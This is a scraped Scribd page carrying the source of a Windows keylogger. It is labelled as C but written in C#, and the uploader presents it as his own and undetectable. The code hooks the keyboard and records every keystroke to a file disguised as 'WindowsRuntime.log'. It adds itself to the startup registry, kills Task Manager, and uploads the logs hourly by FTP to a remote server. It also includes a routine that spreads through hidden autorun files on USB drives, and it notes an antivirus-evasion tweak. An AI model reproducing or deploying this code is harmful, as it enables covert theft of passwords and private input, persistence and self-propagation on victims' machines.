Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd Logo
Upload

Welcome to Scribd!

  • 101 views

    C Keylogger

    Uploaded by

    Moksh Makhija
    This d0cument is the source c0de of a Keylogger written by me in C Language , Totally FUD when I test run it

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as TXT, PDF, TXT or read online from Scribd

    C Keylogger

    Uploaded by

    Moksh Makhija
    101 views9 pages
    This d0cument is the source c0de of a Keylogger written by me in C Language , Totally FUD when I test run it

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    This d0cument is the source c0de of a Keylogger written by me in C Language , Totally FUD when I test run it

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as TXT, PDF, TXT or read online from Scribd
    Download as txt, pdf, or txt
    101 views9 pages

    C Keylogger

    Uploaded by

    Moksh Makhija
    This d0cument is the source c0de of a Keylogger written by me in C Language , Totally FUD when I test run it

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as TXT, PDF, TXT or read online from Scribd
    Download as txt, pdf, or txt
    of 9

    using using using using using using using using using using using using

    System; System.Collections.Generic; System.Text; System.Diagnostics; System.Timers; System.Windows.Forms; System.Runtime.InteropServices; System.IO; System.Net; System.Net.Mail; Microsoft.Win32; System.Threading;

    namespace keylogger { class Program { private const int WH_KEYBOARD_LL = 13; private const int WM_KEYDOWN = 0x0100; private static LowLevelKeyboardProc _proc = HookCallback; private static IntPtr _hookID = IntPtr.Zero; public static string path = Path.Combine(Environment.GetFolderPath(Envir onment.SpecialFolder.ApplicationData), "WindowsRuntime.log"); public static byte caps = 0, shift = 0, failed = 0; [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboa rdProc lpfn, IntPtr hMod, uint dwThreadId); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool UnhookWindowsHookEx(IntPtr hhk); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPt r wParam, IntPtr lParam); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetModuleHandle(string lpModuleName); public static void Main() { _hookID = SetHook(_proc); Program.startup(); System.Timers.Timer timer; timer = new System.Timers.Timer(); timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent); timer.AutoReset = true; timer.Interval = ((60) * (60) * (1000)); timer.Start(); // System.Timers.Timer timer2; // timer2 = new System.Timers.Timer(); // timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread); // timer2.AutoReset = true; // timer2.Interval = 10000; // timer2.Start(); Application.Run(); // GC.KeepAlive(timer); // dont use this line cos avast detects it // GC.KeepAlive(timer2); UnhookWindowsHookEx(_hookID); }

    public static void startup() { //Try to copy keylogger in some folders string source = Application.ExecutablePath.ToString(); string destination = Environment.GetFolderPath(Environment.SpecialFo lder.ApplicationData); destination = System.IO.Path.Combine(destination, "keylogger.exe"); try { System.IO.File.Copy(source, destination, true); source = destination; } catch { Console.WriteLine("No authorization to copy file or other error. "); } //Find if the file already exist in startup try { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTW ARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); if (registryKey.GetValue("WindowsRuntime") == null) { registryKey.SetValue("WindowsRuntime", destination); } registryKey.Close();//dispose of the Key } catch { Console.WriteLine("Error setting startup reg key."); } } public static string GetLocalIP() { string _IP = null; // Resolves a host name or IP address to an IPHostEntry instance. // IPHostEntry - Provides a container class for Internet host addres s information. System.Net.IPHostEntry _IPHostEntry = System.Net.Dns.GetHostEntry(Sy stem.Net.Dns.GetHostName()); // IPAddress class contains the address of a computer on an IP netwo rk. foreach (System.Net.IPAddress _IPAddress in _IPHostEntry.AddressList ) { // InterNetwork indicates that an IP version 4 address is expect ed // when a Socket connects to an endpoint if (_IPAddress.AddressFamily.ToString() == "InterNetwork") { _IP = _IPAddress.ToString(); } }

    return _IP; } public static void OnTimedEvent(object source, EventArgs e) { Process[] ProcessList = Process.GetProcesses(); foreach (Process proc in ProcessList) { if (proc.MainWindowTitle.Contains("Taskmgr.exe")) { proc.Kill(); } } DateTime date = DateTime.Now.AddMonths(0); string fulltime = date.ToString("yyyy:MM:dd-HH:mm"); FtpWebRequest ftpRequest = (FtpWebRequest)WebRequest.Create("ftp://w ebsite.com/Folder/FileName-" + GetLocalIP() + "--" + fulltime + "-.txt"); ftpRequest.Method = WebRequestMethods.Ftp.UploadFile; //if you want to delete, uncomment the line below, and remove the li ne above //requestFileDelete.Method = WebRequestMethods.Ftp.DeleteFile; ftpRequest.Credentials = new NetworkCredential("username", "password "); byte[] uploadContent; string se = Environment.GetFolderPath(Environment.SpecialFolder.Appl icationData) + "//WindowsRuntime.log"; using (StreamReader readStream = new StreamReader((se))) { uploadContent = Encoding.UTF8.GetBytes(readStream.ReadToEnd()); readStream.Close(); } ftpRequest.ContentLength = uploadContent.Length; using (Stream sendStream = ftpRequest.GetRequestStream()) { sendStream.Write(uploadContent, 0, uploadContent.Length); sendStream.Close(); } //ftpRequest.GetResponse(); File.WriteAllText(se, ""); } private static IntPtr SetHook(LowLevelKeyboardProc proc) { using (Process curProcess = Process.GetCurrentProcess()) using (ProcessModule curModule = curProcess.MainModule) { return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(cu rModule.ModuleName), 0); } } private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, I ntPtr lParam); private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lPar

    am) { if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN) { StreamWriter sw = File.AppendText(Program.path); Thread.Sleep(80); int vkCode = Marshal.ReadInt32(lParam); if (Keys.Shift == Control.ModifierKeys) Program.shift = 1; switch ((Keys)vkCode) { case Keys.Space: sw.Write("[SPACE BAR]"); break; case Keys.Menu: case Keys.LMenu: case Keys.RMenu: sw.Write("[ALT KEY]"); break; case Keys.BrowserBack: sw.Write("[BROWSER BACK KEY]"); break; case Keys.BrowserFavorites: sw.Write("[BRWSER FAVOURITES KEY]"); break; case Keys.BrowserForward: sw.Write("[BROWSER FORWARD KEY]"); break; case Keys.BrowserHome: sw.Write("[BROWSER HOME KEY]"); break; case Keys.BrowserRefresh: sw.Write("[BROWSER REFRESH KEY]"); break; case Keys.BrowserSearch: sw.Write("[BROWSER SEARCH KEY]"); break; case Keys.BrowserStop: sw.Write("[BROWSER STOP KEY]"); break; case Keys.ControlKey: case Keys.LControlKey: case Keys.RControlKey: sw.Write("[CTRL]"); break; case Keys.Delete: sw.Write("[DELETE KEY]"); break; case Keys.Return:

    sw.WriteLine("[ENTER]"); break; case Keys.Back: sw.Write("[BACK SPACE]"); break; case Keys.Down: sw.Write("[DOWN KEY]"); break; case Keys.End: sw.Write("[END KEY]"); break; case Keys.Escape: sw.Write("[ESCAPE KEY]"); break; case Keys.Execute: sw.Write("[EXECUTE KEY]"); break; case Keys.Insert: sw.Write("[INSERT KEY]"); break; case Keys.LButton: sw.Write("[LEFT MOUSE CLICKED]"); break; case Keys.Left: sw.Write("[LEFT KEY]"); break; case Keys.MButton: sw.Write("[MIDDLE MOUSE CLICKED]"); break; case Keys.LShiftKey: case Keys.RShiftKey: sw.Write("[SHIFT KEY]"); break; case Keys.NumPad0: sw.Write("0"); break; case Keys.NumPad1: sw.Write("1"); break; case Keys.NumPad2: sw.Write("2"); break; case Keys.NumPad3: sw.Write("3"); break; case Keys.NumPad4:

    sw.Write("4"); break; case Keys.NumPad5: sw.Write("5"); break; case Keys.NumPad6: sw.Write("6"); break; case Keys.NumPad7: sw.Write("7"); break; case Keys.NumPad8: sw.Write("8"); break; case Keys.NumPad9: sw.Write("9"); break; case Keys.RButton: sw.Write("[RIGHT MOUSE CLICKED]"); break; case Keys.Tab: sw.Write("[TAB]"); break; case Keys.Right: sw.Write("[RIGHT KEY]"); break; case Keys.Up: sw.Write("[UP KEY]"); break; case Keys.D0: if (Program.shift == else sw.Write(")"); break; case Keys.D1: if (Program.shift == else sw.Write("!"); break; case Keys.D2: if (Program.shift == else sw.Write("@"); break; case Keys.D3: if (Program.shift == else sw.Write("#"); break; case Keys.D4: if (Program.shift == else sw.Write("$"); break; 0) sw.Write("0");

    0) sw.Write("1");

    0) sw.Write("2");

    0) sw.Write("3");

    0) sw.Write("4");

    case Keys.D5: if (Program.shift == else sw.Write("%"); break; case Keys.D6: if (Program.shift == else sw.Write("^"); break; case Keys.D7: if (Program.shift == else sw.Write("&"); break; case Keys.D8: if (Program.shift == else sw.Write("*"); break; case Keys.D9: if (Program.shift == else sw.Write("("); break;

    0) sw.Write("5");

    0) sw.Write("6");

    0) sw.Write("7");

    0) sw.Write("8");

    0) sw.Write("9");

    case Keys.LWin: case Keys.RWin: case Keys.Apps: sw.Write("[Windows Button]"); break; case Keys.OemQuestion: if (Program.shift == 0) sw.Write("/"); else sw.Write("?"); break; case Keys.OemOpenBrackets: if (Program.shift == 0) sw.Write("["); else sw.Write("{"); break; case Keys.OemCloseBrackets: if (Program.shift == 0) sw.Write("]"); else sw.Write("}"); break; case Keys.Oem1: if (Program.shift == 0) sw.Write(";"); else sw.Write(":"); break; case Keys.Oem7: if (Program.shift == 0) sw.Write("'"); else sw.Write('"'); break; case Keys.Oemcomma: if (Program.shift == 0) sw.Write(","); else sw.Write("<"); break; case Keys.OemPeriod: if (Program.shift == 0) sw.Write("."); else sw.Write(">"); break; case Keys.OemMinus: if (Program.shift == 0) sw.Write("-"); else sw.Write("_"); break; case Keys.Oemplus: if (Program.shift == 0) sw.Write("=");

    else sw.Write("+"); break; case Keys.Oemtilde: if (Program.shift == 0) sw.Write("`"); else sw.Write("~"); break; case Keys.Oem5: sw.Write("|"); break; case Keys.Capital: if (Program.caps == 0) Program.caps = 1; else Program.caps = 0; break; default: if (Program.shift == 0 && Program.caps == 0) sw.Write((( Keys)vkCode).ToString().ToLower()); if (Program.shift == 1 && Program.caps == 0) sw.Write((( Keys)vkCode).ToString().ToUpper()); if (Program.shift == 0 && Program.caps == 1) sw.Write((( Keys)vkCode).ToString().ToUpper()); if (Program.shift == 1 && Program.caps == 1) sw.Write((( Keys)vkCode).ToString().ToLower()); break; } Program.shift = 0; sw.Close(); } return CallNextHookEx(_hookID, nCode, wParam, lParam); } public static void USBSpread(object source, EventArgs e) { /////////////////////////////////////////////////////////////// /////////////////////// USB spread class ////////////////////// /////////////////////////////////////////////////////////////// //A bit modified string source2 = Application.ExecutablePath.ToString(); System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives(); try { foreach (System.IO.DriveInfo drive in drives) { if (drive.DriveType == DriveType.Removable) { string driveAutorun = drive.Name + "autorun.inf"; StreamWriter sw = new StreamWriter(driveAutorun); sw.WriteLine("[autorun]\n"); sw.WriteLine("open=start.exe"); sw.WriteLine("action=Run VMCLite"); sw.Close(); File.SetAttributes(drive.Name + "autorun.inf", File.GetA ttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden); try { File.Copy(source2, drive.Name + "start.exe", true); File.SetAttributes(drive.Name + "start.exe", File.Ge tAttributes(drive.Name + "start.exe") | FileAttributes.Hidden); } finally { Console.WriteLine("Removable device rooted");

    } } } } catch (Exception e2) { Console.WriteLine(e2.ToString()); } } } }

    You might also like